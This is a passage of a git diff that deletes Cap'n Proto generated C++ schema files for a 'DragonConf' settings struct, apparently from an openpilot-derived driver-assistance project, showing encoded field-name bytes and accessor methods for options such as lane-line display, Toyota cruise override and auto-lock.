0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 69, 118, 101, 110, - 116, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 70, 97, 99, 101, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 76, 101, 97, 100, - 73, 110, 102, 111, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 76, 97, 110, 101, - 108, 105, 110, 101, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 67, 104, 101, 118, - 114, 111, 110, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 68, 109, 67, 97, - 109, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 85, 105, 82, 97, 105, 110, - 98, 111, 119, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 83, 110, 103, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 65, 99, 99, 101, 108, 80, - 114, 111, 102, 105, 108, 101, 67, 116, - 114, 108, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 65, 99, 99, 101, 108, 80, - 114, 111, 102, 105, 108, 101, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 67, 114, 117, 105, 115, 101, 79, 118, - 101, 114, 114, 105, 100, 101, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 67, 114, 117, 105, 115, 101, 79, 118, - 101, 114, 114, 105, 100, 101, 83, 112, - 101, 101, 100, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 65, 117, 116, 111, 76, 111, 99, 107, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 65, 117, 116, 111, 85, 110, 108, 111, - 99, 107, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 84, 111, 121, 111, 116, 97, - 68, 101, 98, 117, 103, 66, 115, 109, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 77, 97, 112, 100, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 111, 99, 97, 108, 68, - 98, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 68, 97, 115, 104, 99, 97, - 109, 100, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 77, 97, 122, 100, 97, 83, - 116, 101, 101, 114, 65, 108, 101, 114, - 116, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 83, 112, 101, 101, 100, 67, - 104, 101, 99, 107, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 70, 111, 108, 108, 111, 119, - 105, 110, 103, 80, 114, 111, 102, 105, - 108, 101, 67, 116, 114, 108, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 70, 111, 108, 108, 111, 119, - 105, 110, 103, 80, 114, 111, 102, 105, - 108, 101, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 83, 112, 101, 101, - 100, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 67, 116, 114, 108, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 6, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 76, 97, 110, 101, - 108, 105, 110, 101, 115, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 67, 97, 109, 101, - 114, 97, 79, 102, 102, 115, 101, 116, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 65, 108, 116, 80, 97, 116, 104, - 79, 102, 102, 115, 101, 116, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 69, 50, 69, 67, 111, 110, - 100, 105, 116, 105, 111, 110, 97, 108, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 69, 50, 69, 67, 111, 110, - 100, 105, 116, 105, 111, 110, 97, 108, - 65, 100, 97, 112, 116, 70, 112, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 69, 50, 69, 67, 111, 110, - 100, 105, 116, 105, 111, 110, 97, 108, - 65, 100, 97, 112, 116, 65, 112, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 69, 50, 69, 67, 111, 110, - 100, 105, 116, 105, 111, 110, 97, 108, - 86, 111, 97, 99, 99, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 111, 110, 103, 76, 101, - 97, 100, 77, 111, 118, 105, 110, 103, - 65, 108, 101, 114, 116, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 2, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 112, 76, 97, 116, 101, 114, 97, - 108, 76, 99, 77, 97, 110, 117, 97, - 108, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, } -}; -::capnp::word const* const bp_84e5d575c3177d12 = b_84e5d575c3177d12.words; -#if !CAPNP_LITE -static const uint16_t m_84e5d575c3177d12[] = {25, 24, 0, 33, 44, 46, 45, 47, 37, 36, 10, 38, 42, 40, 41, 43, 39, 7, 6, 49, 2, 8, 9, 5, 4, 3, 32, 1, 48, 31, 34, 35, 28, 29, 26, 27, 30, 23, 13, 20, 14, 21, 16, 17, 19, 18, 22, 12, 15, 11}; -static const uint16_t i_84e5d575c3177d12[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49}; -const ::capnp::_::RawSchema s_84e5d575c3177d12 = { - 0x84e5d575c3177d12, b_84e5d575c3177d12.words, 841, nullptr, m_84e5d575c3177d12, - 0, 50, i_84e5d575c3177d12, nullptr, nullptr, { &s_84e5d575c3177d12, nullptr, nullptr, 0, 0, nullptr } -}; -#endif // !CAPNP_LITE -} // namespace schemas -} // namespace capnp - -// ======================================================================================= - -namespace cereal { - -// DragonConf -constexpr uint16_t DragonConf::_capnpPrivate::dataWordSize; -constexpr uint16_t DragonConf::_capnpPrivate::pointerCount; -#if !CAPNP_LITE -constexpr ::capnp::Kind DragonConf::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* DragonConf::_capnpPrivate::schema; -#endif // !CAPNP_LITE - - -} // namespace - diff --git a/cereal/gen/cpp/dp.capnp.h b/cereal/gen/cpp/dp.capnp.h deleted file mode 100644 index 791cb6df2..000000000 --- a/cereal/gen/cpp/dp.capnp.h +++ /dev/null @@ -1,1115 +0,0 @@ -// Generated by Cap'n Proto compiler, DO NOT EDIT -// source: dp.capnp - -#pragma once - -#include -#include - -#if CAPNP_VERSION != 8000 -#error "Version mismatch between generated code and library headers. You must use the same version of the Cap'n Proto compiler and library." -#endif - - -namespace capnp { -namespace schemas { - -CAPNP_DECLARE_SCHEMA(84e5d575c3177d12); - -} // namespace schemas -} // namespace capnp - -namespace cereal { - -struct DragonConf { - DragonConf() = delete; - - class Reader; - class Builder; - class Pipeline; - - struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(84e5d575c3177d12, 3, 2) - #if !CAPNP_LITE - static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } - #endif // !CAPNP_LITE - }; -}; - -// ======================================================================================= - -class DragonConf::Reader { -public: - typedef DragonConf Reads; - - Reader() = default; - inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} - - inline ::capnp::MessageSize totalSize() const { - return _reader.totalSize().asPublic(); - } - -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { - return ::capnp::_::structString(_reader, *_capnpPrivate::brand()); - } -#endif // !CAPNP_LITE - - inline ::uint8_t getDpAtl() const; - - inline bool hasDpLocale() const; - inline ::capnp::Text::Reader getDpLocale() const; - - inline ::uint8_t getDpLateralMode() const; - - inline ::uint8_t getDpLcMinMph() const; - - inline ::uint8_t getDpLcAutoMinMph() const; - - inline float getDpLcAutoDelay() const; - - inline bool getDpLateralLanelines() const; - - inline ::int8_t getDpLateralCameraOffset() const; - - inline ::int8_t getDpLateralPathOffset() const; - - inline bool getDpLateralRoadEdgeDetected() const; - - inline bool hasDpIpAddr() const; - inline ::capnp::Text::Reader getDpIpAddr() const; - - inline bool getDpUiTop() const; - - inline bool getDpUiSide() const; - - inline ::uint8_t getDpUiBrightness() const; - - inline ::uint8_t getDpUiDisplayMode() const; - - inline bool getDpUiSpeed() const; - - inline bool getDpUiEvent() const; - - inline bool getDpUiFace() const; - - inline bool getDpUiLeadInfo() const; - - inline bool getDpUiLaneline() const; - - inline bool getDpUiChevron() const; - - inline bool getDpUiDmCam() const; - - inline bool getDpUiRainbow() const; - - inline bool getDpToyotaSng() const; - - inline bool getDpAccelProfileCtrl() const; - - inline ::uint8_t getDpAccelProfile() const; - - inline bool getDpToyotaCruiseOverride() const; - - inline ::uint8_t getDpToyotaCruiseOverrideSpeed() const; - - inline bool getDpToyotaAutoLock() const; - - inline bool getDpToyotaAutoUnlock() const; - - inline bool getDpToyotaDebugBsm() const; - - inline bool getDpMapd() const; - - inline bool getDpLocalDb() const; - - inline bool getDpDashcamd() const; - - inline bool getDpMazdaSteerAlert() const; - - inline bool getDpSpeedCheck() const; - - inline bool getDpFollowingProfileCtrl() const; - - inline ::uint8_t getDpFollowingProfile() const; - - inline bool getDpLateralAlt() const; - - inline ::uint8_t getDpLateralAltSpeed() const; - - inline ::uint8_t getDpLateralAltCtrl() const; - - inline bool getDpLateralAltLanelines() const; - - inline ::int8_t getDpLateralAltCameraOffset() const; - - inline ::int8_t getDpLateralAltPathOffset() const; - - inline bool getDpE2EConditional() const; - - inline bool getDpE2EConditionalAdaptFp() const; - - inline bool getDpE2EConditionalAdaptAp() const; - - inline bool getDpE2EConditionalVoacc() const; - - inline ::int8_t getDpLongLeadMovingAlert() const; - - inline bool getDpLateralLcManual() const; - -private: - ::capnp::_::StructReader _reader; - template - friend struct ::capnp::ToDynamic_; - template - friend struct ::capnp::_::PointerHelpers; - template - friend struct ::capnp::List; - friend class ::capnp::MessageBuilder; - friend class ::capnp::Orphanage; -}; - -class DragonConf::Builder { -public: - typedef DragonConf Builds; - - Builder() = delete; // Deleted to discourage incorrect usage. - // You can explicitly initialize to nullptr instead. - inline Builder(decltype(nullptr)) {} - inline explicit Builder(::capnp::_::StructBuilder base): _builder(base) {} - inline operator Reader() const { return Reader(_builder.asReader()); } - inline Reader asReader() const { return *this; } - - inline ::capnp::MessageSize totalSize() const { return asReader().totalSize(); } -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { return asReader().toString(); } -#endif // !CAPNP_LITE - - inline ::uint8_t getDpAtl(); - inline void setDpAtl( ::uint8_t value); - - inline bool hasDpLocale(); - inline ::capnp::Text::Builder getDpLocale(); - inline void setDpLocale( ::capnp::Text::Reader value); - inline ::capnp::Text::Builder initDpLocale(unsigned int size); - inline void adoptDpLocale(::capnp::Orphan< ::capnp::Text>&& value); - inline ::capnp::Orphan< ::capnp::Text> disownDpLocale(); - - inline ::uint8_t getDpLateralMode(); - inline void setDpLateralMode( ::uint8_t value); - - inline ::uint8_t getDpLcMinMph(); - inline void setDpLcMinMph( ::uint8_t value); - - inline ::uint8_t getDpLcAutoMinMph(); - inline void setDpLcAutoMinMph( ::uint8_t value); - - inline float getDpLcAutoDelay(); - inline void setDpLcAutoDelay(float value); - - inline bool getDpLateralLanelines(); - inline void setDpLateralLanelines(bool value); - - inline ::int8_t getDpLateralCameraOffset(); - inline void setDpLateralCameraOffset( ::int8_t value); - - inline ::int8_t getDpLateralPathOffset(); - inline void setDpLateralPathOffset( ::int8_t value); - - inline bool getDpLateralRoadEdgeDetected(); - inline void setDpLateralRoadEdgeDetected(bool value); - - inline bool hasDpIpAddr(); - inline ::capnp::Text::Builder getDpIpAddr(); - inline void setDpIpAddr( ::capnp::Text::Reader value); - inline ::capnp::Text::Builder initDpIpAddr(unsigned int size); - inline void adoptDpIpAddr(::capnp::Orphan< ::capnp::Text>&& value); - inline ::capnp::Orphan< ::capnp::Text> disownDpIpAddr(); - - inline bool getDpUiTop(); - inline void setDpUiTop(bool value); - - inline bool getDpUiSide(); - inline void setDpUiSide(bool value); - - inline ::uint8_t getDpUiBrightness(); - inline void setDpUiBrightness( ::uint8_t value); - - inline ::uint8_t getDpUiDisplayMode(); - inline void setDpUiDisplayMode( ::uint8_t value); - - inline bool getDpUiSpeed(); - inline void setDpUiSpeed(bool value); - - inline bool getDpUiEvent(); - inline void setDpUiEvent(bool value); - - inline bool getDpUiFace(); - inline void setDpUiFace(bool value); - - inline bool getDpUiLeadInfo(); - inline void setDpUiLeadInfo(bool value); - - inline bool getDpUiLaneline(); - inline void setDpUiLaneline(bool value); - - inline bool getDpUiChevron(); - inline void setDpUiChevron(bool value); - - inline bool getDpUiDmCam(); - inline void setDpUiDmCam(bool value); - - inline bool getDpUiRainbow(); - inline void setDpUiRainbow(bool value); - - inline bool getDpToyotaSng(); - inline void setDpToyotaSng(bool value); - - inline bool getDpAccelProfileCtrl(); - inline void setDpAccelProfileCtrl(bool value); - - inline ::uint8_t getDpAccelProfile(); - inline void setDpAccelProfile( ::uint8_t value); - - inline bool getDpToyotaCruiseOverride(); - inline void setDpToyotaCruiseOverride(bool value); - - inline ::uint8_t getDpToyotaCruiseOverrideSpeed(); - inline void setDpToyotaCruiseOverrideSpeed( ::uint8_t value); - - inline bool getDpToyotaAutoLock(); - inline void setDpToyotaAutoLock(bool value); - - inline bool getDpToyotaAutoUnlock(); - inline void setDpToyotaAutoUnlock(bool value); - - inline bool getDpToyotaDebugBsm(); - inline void setDpToyotaDebugBsm(bool value); - - inline bool getDpMapd(); - inline void setDpMapd(bool value); - - inline bool getDpLocalDb(); - inline void setDpLocalDb(bool value); - - inline bool getDpDashcamd(); - inline void setDpDashcamd(bool value); - - inline bool getDpMazdaSteerAlert(); - inline void setDpMazdaSteerAlert(bool value); - - inline bool getDpSpeedCheck(); - inline void setDpSpeedCheck(bool value); - - inline bool getDpFollowingProfileCtrl(); - inline void setDpFollowingProfileCtrl(bool value); - - inline ::uint8_t getDpFollowingProfile(); - inline void setDpFollowingProfile( ::uint8_t value); - - inline bool getDpLateralAlt(); - inline void setDpLateralAlt(bool value); - - inline ::uint8_t getDpLateralAltSpeed(); - inline void setDpLateralAltSpeed( ::uint8_t value); - - inline ::uint8_t getDpLateralAltCtrl(); - inline void setDpLateralAltCtrl( ::uint8_t value); - - inline bool getDpLateralAltLanelines(); - inline void setDpLateralAltLanelines(bool value); - - inline ::int8_t getDpLateralAltCameraOffset(); - inline void setDpLateralAltCameraOffset( ::int8_t value); - - inline ::int8_t getDpLateralAltPathOffset(); - inline void setDpLateralAltPathOffset( ::int8_t value); - - inline bool getDpE2EConditional(); - inline void setDpE2EConditional(bool value); - - inline bool getDpE2EConditionalAdaptFp(); - inline void setDpE2EConditionalAdaptFp(bool value); - - inline bool getDpE2EConditionalAdaptAp(); - inline void setDpE2EConditionalAdaptAp(bool value); - - inline bool getDpE2EConditionalVoacc(); - inline void setDpE2EConditionalVoacc(bool value); - - inline ::int8_t getDpLongLeadMovingAlert(); - inline void setDpLongLeadMovingAlert( ::int8_t value); - - inline bool getDpLateralLcManual(); - inline void setDpLateralLcManual(bool value); - -private: - ::capnp::_::StructBuilder _builder; - template - friend struct ::capnp::ToDynamic_; - friend class ::capnp::Orphanage; - template - friend struct ::capnp::_::PointerHelpers; -}; - -#if !CAPNP_LITE -class DragonConf::Pipeline { -public: - typedef DragonConf Pipelines; - - inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} - inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) - : _typeless(kj::mv(typeless)) {} - -private: - ::capnp::AnyPointer::Pipeline _typeless; - friend class ::capnp::PipelineHook; - template - friend struct ::capnp::ToDynamic_; -}; -#endif // !CAPNP_LITE - -// ======================================================================================= - -inline ::uint8_t DragonConf::Reader::getDpAtl() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<0>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpAtl() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<0>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpAtl( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<0>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::hasDpLocale() const { - return !_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline bool DragonConf::Builder::hasDpLocale() { - return !_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::Text::Reader DragonConf::Reader::getDpLocale() const { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline ::capnp::Text::Builder DragonConf::Builder::getDpLocale() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void DragonConf::Builder::setDpLocale( ::capnp::Text::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline ::capnp::Text::Builder DragonConf::Builder::initDpLocale(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::Text>::init(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), size); -} -inline void DragonConf::Builder::adoptDpLocale( - ::capnp::Orphan< ::capnp::Text>&& value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::adopt(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::Text> DragonConf::Builder::disownDpLocale() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::disown(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} - -inline ::uint8_t DragonConf::Reader::getDpLateralMode() const { - return _reader.getDataField< ::uint8_t>( - 